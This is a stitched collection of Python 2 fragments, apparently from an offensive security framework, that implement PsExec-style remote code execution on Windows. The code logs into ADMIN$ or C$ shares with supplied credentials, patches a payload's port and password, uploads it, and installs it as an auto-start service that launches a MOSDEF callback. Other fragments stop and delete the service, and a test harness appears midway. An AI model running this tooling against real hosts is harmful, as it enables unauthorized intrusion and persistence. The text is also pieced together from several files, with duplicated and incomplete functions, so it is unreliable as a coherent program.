def exec_native_callback(self):
logging.info("Uploading and executing a privileged MOSDEF callback")
# Upload our callback
f = file(self.local_callback, 'r')
self.client.put(f, self.remote_callback)
f.close()
# Upload our service
if self.is_64bit:
f = file(self.local_service_64, 'r')
else:
f = file(self.local_service_32, 'r')
self.client.put(f, self.remote_service)
f.close()
# Setup dcerpc/svcctl in order to reuse our upgraded SMB connection
binding = u'ncacn_np:%s[\\svcctl]' % self.host
dce = DCERPC(binding, getsock=None, smb_client=self.client)
svc = svcctl.SVCCTLClient(self.host, dce=dce)
svc.dce.bind(svc.uuid[0], svc.uuid[1])
# Create service
try:
handle = svc.open_manager()
svc.create_service(handle=handle,
service_name=self.service_name,
binary_pathname=self.remote_service,
display_name=self.service_name,
start_type=svcctl.SVCCTL_SERVICE_AUTO_START)
except svcctl.SVCCTLCreateServiceException as e:
logging.error('Error while creating service (%s)' % str(e))
return False
else:
logging.info("Service has been created successfully (%s)" %
self.service_name)
try:
service_handle = svc.open_service(self.service_name)
except svcctl.SVCCTLCreateServiceException as e:
logging.critical('svc.open_service() failed (%s)' % str(e))
return False
# Start service
try:
svc.start_service(service_handle, args=[self.remote_callback])
except svcctl.SVCCTLCreateServiceException as e:
logging.critical("Service could not be started (%s)" % str(e))
return False
# Close everything
svc.close_service(service_handle)
svc.close_manager()
return True
def ServicesConnect(self):
try:
self.mySVC = svcctl.SVCCTLClient(self.host)
self.mySVC.set_credentials(username=self.user,
password=self.password,
domain=self.domain)
if not self.mySVC.bind():
self.log('bind() failed.')
return False
else:
self.log('Connected!')
return True
except Exception, msg:
self.log(msg)
self.log(
'Could not connect to remote server - service is not running or the host is firewalled.'
)
return False
def run(self):
self.getargs()
if not self.test():
return 0
self.log("Starting Windows Service")
try:
self.mySVC = svcctl.SVCCTLClient(self.host)
self.mySVC.set_credentials(username=self.msrpcuser, password=self.msrpcpassword, domain=self.domain)
if not self.mySVC.bind():
self.log("Unable to connect to the RPC interface: bind failed.")
return 0
except Exception as e:
self.log("Unable to connect to the RPC interface: %s" % str(e))
return 0
self.log('Connected!')
try:
handle = self.mySVC.open_manager()
except Exception as e:
self.log('Failed to contact the service manager: %s' % (str(e)))
return 0
try:
service_handle = self.mySVC.open_service(self.serviceName)
except Exception as e:
self.log("Was unable to call OpenService: %s" % str(e))
return 0
try:
self.mySVC.start_service(service_handle)
except Exception as e:
self.log("There was an error starting the MOSDEF service: %s" % str(e))
return 0
self.log("Successfully started the service %s." % self.serviceName)
# Closing everything.
self.mySVC.close_service(service_handle)
self.mySVC.close_manager()
return 1
def cleanup_native(self):
# Setup dcerpc/svcctl in order to reuse our upgraded SMB connection
binding = u'ncacn_np:%s[\\svcctl]' % self.host
dce = DCERPC(binding, getsock=None, smb_client=self.client)
svc = svcctl.SVCCTLClient(self.host, dce=dce)
svc.dce.bind(svc.uuid[0], svc.uuid[1])
logging.info("Stopping service (%s)" % self.service_name)
try:
service_handle = svc.open_service(self.service_name)
svc.stop_service(service_handle)
# We allow up to 5s for the service to stop
logging.info("Sleeping for %ds" % self.timeout)
for i in range(0, self.timeout):
ret = svc.query_service(service_handle)
if ret['CurrentState'] == svcctl.SVCCTL_SERVICE_STOPPED:
break
time.sleep(1)
except Exception as e:
logging.error("Failed to stop service (%s)" % str(e))
else:
logging.info("Service has been stopped successfully")
logging.info("Deleting service (%s)" % self.service_name)
try:
service_handle = svc.delete_service(service_name=self.service_name)
svc.close_service(service_handle)
except Exception as e:
logging.critical("Error while deleting service (%s)" % str(e))
return False
else:
logging.info("Service (%s) has been deleted successfully" %
self.service_name)
return True
except Exception as e:
print e
def Test7(svc, srv_name='Cdfs'):
try:
handle = svc.open_manager()
handle = svc.open_service(srv_name)
svc.stop_service(handle)
svc.close_service(handle)
svc.close_manager()
except Exception as e:
print e
if __name__ == "__main__":
for vec in TEST_VECTORS:
print "*********************** %s ***********************" % vec['domain']
svc = svcctl.SVCCTLClient(vec['host'])
svc.set_credentials(vec['user'], vec['passwd'], vec['domain'])
svc.bind()
Test1(svc)
Test2(svc) # Must generate an exception!
Test3(svc)
Test3_bis(svc)
Test4(svc)
Test5(svc)
Test6(svc, srv_name='IPSec') # start
Test7(svc, srv_name='WebClient') # stop
def run(self):
self.getargs()
if not self.test():
return 0
if self.serviceName.count(" "):
self.log("Service Name can't have spaces!")
return 0
self.password = self.password[:32] #32 bytes long always
self.password = stroverwrite("\x00" * 32, self.password,
0) #pad to 32 bytes of zeros
self.log("Using password: %s" % prettyprint(self.password))
node = self.argsDict["passednodes"][0]
self.log("Using Windows MOSDEF Service")
self.log("Trying to log into ADMIN$/C/D file share")
vfs = None
for sharename in [u"ADMIN$", u"C$", u"D$"]:
vfs = self.exploitnodes(
"smbclient", [node], {
"password": self.msrpcpassword,
"user": self.msrpcuser,
"filename": sharename,
"domain": self.domain
})
if len(vfs):
if len(vfs[0]):
vfs = vfs[0][0]
else:
self.log("Failed to get into that file share...")
vfs = None
continue
self.log("VFS=%s" % vfs)
if vfs:
self.log("We managed to get into a share on %s!" % self.host)
self.log(u"Sharename: %s Username: %s Password: %s" %
(sharename, self.msrpcuser, self.msrpcpassword))
break
if not vfs:
self.log("Failed: Could not get into a share to upload our file!")
return 0
# now we need to transform our input file such that it uses the new port
sourcefile = self.sourceDict["win32"]
data = file(sourcefile, "rb").read()
# replace push 5555 with push self.port
self.log("Using port %d for MOSDEFService" % self.port)
data = data.replace(mosdef.assemble("push $5555", "X86"),
mosdef.assemble("push $%d" % self.port, "X86"))
oldpassword = "******" * 16 + "B" * 16
data = data.replace(oldpassword, self.password)
modified_sourcefile = sourcefile + ".port_%d" % self.port
outfd = file(modified_sourcefile, "wb+")
outfd.write(data)
outfd.close()
# now we've written to modified_sourcefile, so we need to use that as our upload src
upload = self.engine.getModuleExploit("upload")
self.log("Uploading with VFS: %s" % vfs)
upload.link(self, nodes=[vfs])
upload.argsDict["source"] = modified_sourcefile
upload.argsDict["destfilename"] = self.binaryName
self.log(u"Uploading file %s to %s" %
(modified_sourcefile, self.binaryName))
ret = upload.run()
self.log("upload.result: %s" % ret)
if not ret:
self.log("Could not upload file!")
return 0
self.log(
"We were able to upload the file and now we must create a new service that points to it"
)
try:
self.mySVC = svcctl.SVCCTLClient(self.host)
self.mySVC.set_credentials(username=self.msrpcuser,
password=self.msrpcpassword,
domain=self.domain)
self.mySVC.bind()
except Exception as e:
self.log("Unable to connect to the RPC interface: %s" % str(e))
return 0
self.log('Connected!')
binarypath = self.binaryName
if sharename == "ADMIN$":
binarypath = "%SYSTEMROOT%\\" + binarypath
else:
binarypath = sharename[0] + "\\" + binarypath
self.log("ServiceName=%s DisplayName=%s BinaryPath=%s" %
(self.serviceName, self.displayName, binarypath))
try:
handle = self.mySVC.open_manager()
service_handle = self.mySVC.create_service(
handle=handle,
service_name=self.serviceName,
binary_pathname=binarypath,
display_name=self.displayName,
start_type=svcctl.SVCCTL_SERVICE_AUTO_START)
except Exception as e:
self.log('Failed to create the \'%s\' service: %s' %
(self.serviceName, str(e)))
return 0
self.log("Called create service successfully")
try:
service_handle = self.mySVC.open_service(self.serviceName)
except Exception as e:
self.log("Was unable to call OpenService!")
self.log(e)
return 0
try:
self.mySVC.start_service(service_handle)
except Exception as e:
self.log("There was an error starting the MOSDEF service: %s" %
str(e))
return 0
self.log("Successfully installed and started the MOSDEF service.")
# Closing everything.
self.mySVC.close_service(service_handle)
self.mySVC.close_manager()
return 1
def stop_and_delete_service(self):
try:
self.mySVC = svcctl.SVCCTLClient(self.host)
if self.use_kerberos:
self.mySVC.set_credentials(username=self.user,
password=self.password,
domain=self.domain,
kerberos_db=self.ccache_file,
use_krb5=True)
else:
self.mySVC.set_credentials(username=self.user,
password=self.password,
domain=self.domain)
self.mySVC.bind()
except Exception as e:
if self.debug_errors:
logging.debug('stop_and_delete_service() failed: %s' % str(e))
logging.error("Unable to (re)connect to the RPC interface: %s" %
str(e))
return False
logging.info("Stopping service %s stored in %s" %
(self.service_name, self.remote_service))
try:
service_handle = self.mySVC.open_service(self.service_name)
self.mySVC.stop_service(service_handle)
# We allow up to 5s for the service to stop
logging.info('Sleeping for %ds' % self.timeout)
for i in xrange(0, self.timeout, 1):
ret = self.mySVC.query_service(service_handle)
if ret['CurrentState'] == svcctl.SVCCTL_SERVICE_STOPPED:
break
time.sleep(1)
except Exception as e:
if self.debug_errors:
logging.debug('stop_and_delete_service() failed: %s' % str(e))
logging.error('Failed to stop the \'%s\' service: %s' %
(self.service_name, str(e)))
else:
logging.info("Service %s has been stopped successfully" %
self.service_name)
# Whether we were successfull or not in stopping the service, we delete it
logging.info("Deleting service %s stored in %s" %
(self.service_name, self.remote_service))
try:
service_handle = self.mySVC.delete_service(
service_name=self.service_name)
self.mySVC.close_service(service_handle)
except Exception as e:
logging.error('Failed to delete the \'%s\' service: %s' %
(self.service_name, str(e)))
logging.error(str(e))
return False
else:
logging.info("Service %s has been deleted successfully" %
self.service_name)
return True
def create_and_start_service(self):
try:
self.mySVC = svcctl.SVCCTLClient(self.host)
if self.use_kerberos:
self.mySVC.set_credentials(username=self.user,
password=self.password,
domain=self.domain,
kerberos_db=self.ccache_file,
use_krb5=True)
else:
self.mySVC.set_credentials(username=self.user,
password=self.password,
domain=self.domain)
if not self.mySVC.bind():
logging.error(
"Unable to connect to the RPC interface: bind failed.")
return False
except Exception as e:
if self.debug_errors:
logging.debug('create_and_start_service() failed: %s' % str(e))
logging.error("Unable to connect to the RPC interface: %s" %
str(e))
return False
logging.info("Adding service %s stored in %s" %
(self.service_name, self.remote_service))
self.setProgress(80)
try:
handle = self.mySVC.open_manager()
self.mySVC.create_service(
handle=handle,
service_name=self.service_name,
binary_pathname='%SYSTEMROOT%\\' + self.remote_service,
display_name=self.service_name,
start_type=svcctl.SVCCTL_SERVICE_AUTO_START)
except Exception as e:
if self.debug_errors:
logging.debug('create_and_start_service() failed: %s' % str(e))
logging.error('Failed to create the \'%s\' service: %s' %
(self.service_name, str(e)))
return False
else:
logging.info("Service %s has been created successfully" %
self.service_name)
self.setProgress(90)
try:
service_handle = self.mySVC.open_service(self.service_name)
except Exception as e:
if self.debug_errors:
logging.debug('create_and_start_service() failed: %s' % str(e))
logging.error("The service could not be open")
return False
try:
# Starting the service
self.mySVC.start_service(
service_handle, args=['C:\\Windows\\%s' % self.callback_name])
except Exception as e:
logging.error("The service could not be started")
logging.error(str(e))
return False
# Closing everything
self.mySVC.close_service(service_handle)
self.mySVC.close_manager()
return True